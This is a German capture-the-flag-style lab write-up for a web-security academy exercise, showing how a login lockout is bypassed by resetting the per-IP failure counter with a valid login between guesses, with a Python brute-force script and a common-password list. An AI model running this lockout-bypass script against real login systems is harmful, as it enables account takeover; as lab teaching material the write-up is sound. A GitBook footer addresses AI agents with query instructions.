> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/authentication/broken-brute-force-protection-ip-block.md).

# Fehlerhafter Brute-Force-Schutz mit IP-basierter Blockierung

### Defekter Schutz vor Brute-Force-Angriffen, IP-Blockierung

Dieses Labor hat einen logischen Fehler in seinem Schutz gegen Brute-Force-Angriffe. / Das Ziel ist es, **das Passwort des Opfers zu stärken** und sich dann bei seinem Konto anzumelden.

* **Bereitgestellte Zugangsdaten:** wiener / peter
* **Benutzername des Opfers:** carlos

#### Beobachtung des Sperrmechanismus

Das Testen mehrerer Kombinationen für den Benutzer carlos zeigt, dass nach **drei falschen Versuchen**, zeigt die Anwendung:

> *Sie haben zu viele falsche Anmeldeversuche unternommen. Bitte versuchen Sie es in 1 Minute(n) erneut.*

Die Website wendet daher eine **eine auf der IP-Adresse basierende Sperre** nach mehreren aufeinanderfolgenden Fehlversuchen an.

<figure><img src="/files/b119c9a3296fec8866e9996a8fb04b4308211608" alt=""><figcaption></figcaption></figure>

### Umgehung der IP-Blockierung

Um diese Schutzmaßnahme zu umgehen, wird ein logischer Fehler ausgenutzt:

* Wir senden **zwei** ungültige Versuche für carlos.

<figure><img src="/files/cfbf14878cbe63a2aa617175fb2044b0d8579d48" alt=""><figcaption></figcaption></figure>

* Beim **dritten** Versuch senden wir eine gültige\*\* Authentifizierung, aber mit wiener-IDs: peter.
* Da diese Verbindung erfolgreich ist, setzt das System \*\* den Zähler\*\* für diese IP-Adresse zurück.

### Verwendetes Python-Skript

Das folgende Skript automatisiert den Angriff, indem es zwei Passwörter für carlos testet und dann den Zähler über eine erfolgreiche Verbindung als wiener zurücksetzt:

```python
import requests
import time

url = "https://0a19006903c3409a83f97eef000a00be.web-security-academy.net/login"
session_cookie = "7iUGnIrXGPogHTIfzuPfAC89Jel0jghh"

passwords = [
    "123456", "password", "12345678", "qwerty", "123456789", "12345", "1234",
    "111111", "1234567", "dragon", "123123", "baseball", "abc123", "football",
    "monkey", "letmein", "shadow", "master", "666666", "qwertyuiop", "123321",
    "mustang", "1234567890", "michael", "654321", "superman", "1qaz2wsx",
    "7777777", "121212", "000000", "qazwsx", "123qwe", "killer", "trustno1",
    "jordan", "jennifer", "zxcvbnm", "asdfgh", "hunter", "buster", "soccer",
    "harley", "batman", "andrew", "tigger", "sunshine", "iloveyou", "2000",
    "charlie", "robert", "thomas", "hockey", "ranger", "daniel", "starwars",
    "klaster", "112233", "george", "computer", "michelle", "jessica", "pepper",
    "1111", "zxcvbn", "555555", "11111111", "131313", "freedom", "777777",
    "pass", "maggie", "159753", "aaaaaa", "ginger", "princess", "joshua",
    "cheese", "amanda", "summer", "love", "ashley", "nicole", "chelsea",
    "biteme", "matthew", "access", "yankees", "987654321", "dallas", "austin",
    "thunder", "taylor", "matrix", "mobilemail", "mom", "monitor", "monitoring",
    "montana", "moon", "moscow"
]

session = requests.Session()

def login(username, password):
    headers = {'Cookie': f'session={session_cookie}'}
    data = {'username': username, 'password': password}
    return session.post(url, headers=headers, data=data, allow_redirects=False)

for i in range(0, len(passwords), 2):
    batch = passwords[i:i+2]

    for password in batch:
        print(f"Versuche carlos:{password}")
        response = login("carlos", password)

        if response.status_code == 302:
            print(f"PASSWORT GEFUNDEN! carlos:{password}")
            exit()

    if i + 2 < len(passwords):
        print("Zurücksetzen mit wiener:peter")
        login("wiener", "peter")
        time.sleep(1)

print("Passwort nicht gefunden")
```

Das korrekte Passwort für carlos, das durch den Angriff entdeckt wurde, ist:

> **michelle**

<figure><img src="/files/f09e915c42a28d71053ea84eac88c38b1c7a996c" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/authentication/broken-brute-force-protection-ip-block.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
